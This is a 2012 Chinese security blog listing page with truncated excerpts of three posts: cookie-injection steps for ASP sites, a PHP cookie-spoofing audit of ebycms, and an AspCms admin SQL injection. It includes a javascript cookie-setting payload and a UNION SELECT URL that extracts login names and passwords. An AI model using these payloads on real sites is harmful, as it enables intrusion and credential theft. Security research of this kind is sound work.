Cookies注入步骤

分类:安全 | 2012-03-26 | 撸过 1,194 次
0人扯谈

Cookies注入步骤

1)寻找形如“*.asp?id=x”类的带参数的rul

2)去掉“id=x”查看页面显示是否正常。如果不正常,说明差数在数据传递中时直接起作用的

3)清空浏览器地址,输入“

javascript:alert(document.cookie=“id=”+escape("x"));

按Enter返回一个对话框,内容是“id=x”,然后用原来的url刷新页面,如果显示正常,

说明代码是用Request("ID")这种格式收集数据的,可以利用cookies进行注入

4)重复上面的步骤,将常规脚本注入判断语句戴入上面的URL:"

javascript:javascr[......]

继续阅读

php 源码审计之 cookies 欺骗

分类:安全 | 2012-02-23 | 撸过 376 次
0人扯谈

ebycms是一套手机音乐cms系统

直接上代码

admin目录下的in.php

<?php require_once('L:/wamp/www//fern.php');
Annotation("L:\wamp\www\eby\admin\in.php_0");

define(EBY_IN,TRUE);
define('ADMIN_ROOT',  str_replace("\","/",dirname(__FILE__))."/");
define('EBY_ROOT',dirname(ADMIN_ROOT).'/');

require_once (EBY_ROOT.'contr[......]

继续阅读

aspcms cookies欺骗和后台无验证注入

分类:安全 | 2012-02-11 | 撸过 1,904 次
1人扯谈

后台文件AspCms_AboutEdit.asp 未进行验证,且未过滤,导致SQL注入。而且纯在cookies欺骗!

————————后台注射————————

 

http://www.webshell.cc/admin/_content/_About/AspCms_AboutEdit.asp?id=1%20and%201=2%20union%20select%201,2,3,4,5,loginname,7,8,9,password,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3[......]

继续阅读